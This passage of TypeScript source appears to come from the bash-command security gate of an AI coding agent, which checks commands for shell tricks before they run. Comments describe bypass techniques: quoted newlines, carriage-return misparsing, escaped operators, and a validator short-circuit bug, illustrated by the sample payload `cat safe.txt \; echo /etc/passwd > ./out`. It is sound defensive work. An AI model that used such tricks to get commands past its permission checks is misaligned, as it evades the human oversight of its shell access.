    // Run comment-quote-desync BEFORE validateNewlines: it detects cases where
    // the quote tracker would miss newlines due to # comment desync.
    validateCommentQuoteDesync,
    // Run quoted-newline BEFORE validateNewlines: it detects the INVERSE case
    // (newlines INSIDE quotes, which validateNewlines ignores by design). Quoted
    // newlines let attackers split commands across lines so that line-based
    // processing (stripCommentLines) drops sensitive content.
    validateQuotedNewline,
    // CR check runs BEFORE validateNewlines — CR is a MISPARSING concern
    // (shell-quote/bash tokenization differential), LF is not.
    validateCarriageReturn,
    validateNewlines,
    validateIFSInjection,
    validateProcEnvironAccess,
    validateDangerousPatterns,
    validateRedirections,
    validateBackslashEscapedWhitespace,
    validateBackslashEscapedOperators,
    validateUnicodeWhitespace,
    validateMidWordHash,
    validateBraceExpansion,
    validateZshDangerousCommands,
    // Run malformed token check last - other validators should catch specific patterns first
    // (e.g., $() substitution, backticks, etc.) since they have more precise error messages
    validateMalformedTokenInjection,
  ]

  // SECURITY: We must NOT short-circuit when a non-misparsing validator
  // returns 'ask' if there are still misparsing validators later in the list.
  // Non-misparsing ask results are discarded in bashPermissions.ts (the gate
  // only blocks when isBashSecurityCheckForMisparsing is set). If
  // validateRedirections (non-misparsing) fires first on `>`, it returns
  // ask-without-flag — but validateBackslashEscapedOperators (misparsing,
  // LATER in the list) would have caught `\;` WITH the flag. Short-circuiting
  // lets a payload like `cat safe.txt \; echo /etc/passwd > ./out` slip
  // through.
  //
  // Fix: defer non-misparsing ask results. Continue running validators; if any
  // misparsing validator fires, return THAT (with the flag). Only if we reach
  // the end without a misparsing ask, return the first deferred
  // non-misparsing ask.
  let deferredNonMisparsingResult: PermissionResult | null = null
  for (const validator of validators) {
    const result = validator(context)
    if (result.behavior === 'ask') {
      if (nonMisparsingValidators.has(validator)) {
        if (deferredNonMisparsingResult === null) {
          deferredNonMisparsingResult = result
        }
        continue
      }
      return { ...result, isBashSecurityCheckForMisparsing: true as const }
    }
  }
  if (deferredNonMisparsingResult !== null) {
    return deferredNonMisparsingResult
  }

  return {
    behavior: 'passthrough',
    message: 'Command passed all security checks',
  }
}
|
|
|
|
/**
 * @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is
 * unavailable. The primary gate is parseForSecurity (ast.ts).
 *
 * Promise-returning variant of bashCommandIsSafe_DEPRECATED. It parses the
 * command with ParsedCommand and, when a tree-sitter analysis is produced,
 * feeds that analysis' quote context into the validator pipeline. When no
 * analysis is produced it delegates to the sync bashCommandIsSafe_DEPRECATED.
 *
 * Intended for async callers (bashPermissions.ts, bashCommandHelpers.ts).
 * Sync callers (readOnlyValidation.ts) should keep using
 * bashCommandIsSafe_DEPRECATED().
 *
 * @param command - The raw shell command string to check.
 * @param onDivergence - Optional callback invoked (instead of emitting a
 *   logEvent) when the tree-sitter and regex quote extractions disagree.
 *   Lets a caller that fans out over many subcommands batch the reports.
 * @returns A PermissionResult: 'passthrough' when nothing objected, otherwise
 *   the result of the validator that objected. 'ask' results are tagged with
 *   isBashSecurityCheckForMisparsing, except those from validateNewlines and
 *   validateRedirections, which are returned untagged.
 */
export async function bashCommandIsSafeAsync_DEPRECATED(
  command: string,
  onDivergence?: () => void,
): Promise<PermissionResult> {
  // Without a tree-sitter analysis there is nothing to enrich the context
  // with, so hand the command to the sync regex implementation.
  const parsedCommand = await ParsedCommand.parse(command)
  const analysis = parsedCommand?.getTreeSitterAnalysis() ?? null
  if (!analysis) {
    return bashCommandIsSafe_DEPRECATED(command)
  }

  // Pre-checks that gain nothing from tree-sitter: control characters and the
  // shell-quote single-quote bug are tested on the raw command string.
  if (CONTROL_CHAR_RE.test(command)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.CONTROL_CHARACTERS,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains non-printable control characters that could be used to bypass security checks',
      isBashSecurityCheckForMisparsing: true,
    }
  }

  if (hasShellQuoteSingleQuoteBug(command)) {
    return {
      behavior: 'ask',
      message:
        'Command contains single-quoted backslash pattern that could bypass security checks',
      isBashSecurityCheckForMisparsing: true,
    }
  }

  const { processedCommand: heredocStrippedCommand } = extractHeredocs(
    command,
    { quotedOnly: true },
  )

  // First space-delimited word of the raw command ('' when it is empty).
  const [baseCommand = ''] = command.split(' ')

  // Tree-sitter's quote context drives the validators; the regex extraction
  // is computed only as a reference for the divergence report below.
  const { quoteContext } = analysis
  const regexQuotes = extractQuotedContent(
    heredocStrippedCommand,
    baseCommand === 'jq',
  )

  const context: ValidationContext = {
    originalCommand: command,
    baseCommand,
    unquotedContent: quoteContext.withDoubleQuotes,
    fullyUnquotedContent: stripSafeRedirections(quoteContext.fullyUnquoted),
    fullyUnquotedPreStrip: quoteContext.fullyUnquoted,
    unquotedKeepQuoteChars: quoteContext.unquotedKeepQuoteChars,
    treeSitter: analysis,
  }

  // Report disagreement between the two quote extractions. Heredoc commands
  // are excluded: tree-sitter strips (quoted) heredoc bodies to nothing while
  // the regex path substitutes placeholder strings (via extractHeredocs), so
  // those outputs can never match and would only add noise to the signal.
  //
  // When onDivergence is supplied (fanout loop in bashPermissions.ts running
  // Promise.all over subcommands) the caller batches divergences into one
  // logEvent instead of N. Each logEvent triggers getEventMetadata() →
  // buildProcessMetrics() → process.memoryUsage() → /proc/self/stat read;
  // with memoized metadata these resolve as microtasks and starve the event
  // loop (CC-643). Callers that omit the callback get a logEvent per call.
  const quotesDiverge =
    !analysis.dangerousPatterns.hasHeredoc &&
    (quoteContext.fullyUnquoted !== regexQuotes.fullyUnquoted ||
      quoteContext.withDoubleQuotes !== regexQuotes.withDoubleQuotes)
  if (quotesDiverge) {
    if (!onDivergence) {
      logEvent('tengu_tree_sitter_security_divergence', {
        quoteContextDivergence: true,
      })
    } else {
      onDivergence()
    }
  }

  // Stage 1: validators whose verdict ends the check immediately. An 'allow'
  // is reported to the caller as 'passthrough'; any other non-passthrough
  // verdict is returned as-is, with 'ask' additionally tagged as misparsing.
  const earlyValidators = [
    validateEmpty,
    validateIncompleteCommands,
    validateSafeCommandSubstitution,
    validateGitCommit,
  ]

  for (const runEarlyCheck of earlyValidators) {
    const outcome = runEarlyCheck(context)
    if (outcome.behavior === 'passthrough') {
      continue
    }
    if (outcome.behavior === 'allow') {
      const reason = outcome.decisionReason
      return {
        behavior: 'passthrough',
        message:
          reason?.type === 'other' || reason?.type === 'safetyCheck'
            ? reason.reason
            : 'Command allowed',
      }
    }
    if (outcome.behavior === 'ask') {
      return { ...outcome, isBashSecurityCheckForMisparsing: true as const }
    }
    return outcome
  }

  // Validators whose 'ask' is NOT a misparsing concern. Their result is held
  // back so that a misparsing validator later in the list still gets to run.
  const nonMisparsingValidators = new Set([
    validateNewlines,
    validateRedirections,
  ])

  // Stage 2: the main pipeline. Order is significant and must not change.
  const validators = [
    validateJqCommand,
    validateObfuscatedFlags,
    validateShellMetacharacters,
    validateDangerousVariables,
    validateCommentQuoteDesync,
    validateQuotedNewline,
    validateCarriageReturn,
    validateNewlines,
    validateIFSInjection,
    validateProcEnvironAccess,
    validateDangerousPatterns,
    validateRedirections,
    validateBackslashEscapedWhitespace,
    validateBackslashEscapedOperators,
    validateUnicodeWhitespace,
    validateMidWordHash,
    validateBraceExpansion,
    validateZshDangerousCommands,
    validateMalformedTokenInjection,
  ]

  // The first misparsing 'ask' wins and returns at once with the flag set.
  // Only the first non-misparsing 'ask' is remembered, and it is returned
  // only if the whole list completes without a misparsing 'ask'.
  let firstNonMisparsingAsk: PermissionResult | null = null
  for (const runCheck of validators) {
    const outcome = runCheck(context)
    if (outcome.behavior !== 'ask') {
      continue
    }
    if (!nonMisparsingValidators.has(runCheck)) {
      return { ...outcome, isBashSecurityCheckForMisparsing: true as const }
    }
    if (firstNonMisparsingAsk === null) {
      firstNonMisparsingAsk = outcome
    }
  }

  if (firstNonMisparsingAsk !== null) {
    return firstNonMisparsingAsk
  }
  return {
    behavior: 'passthrough',
    message: 'Command passed all security checks',
  }
}
|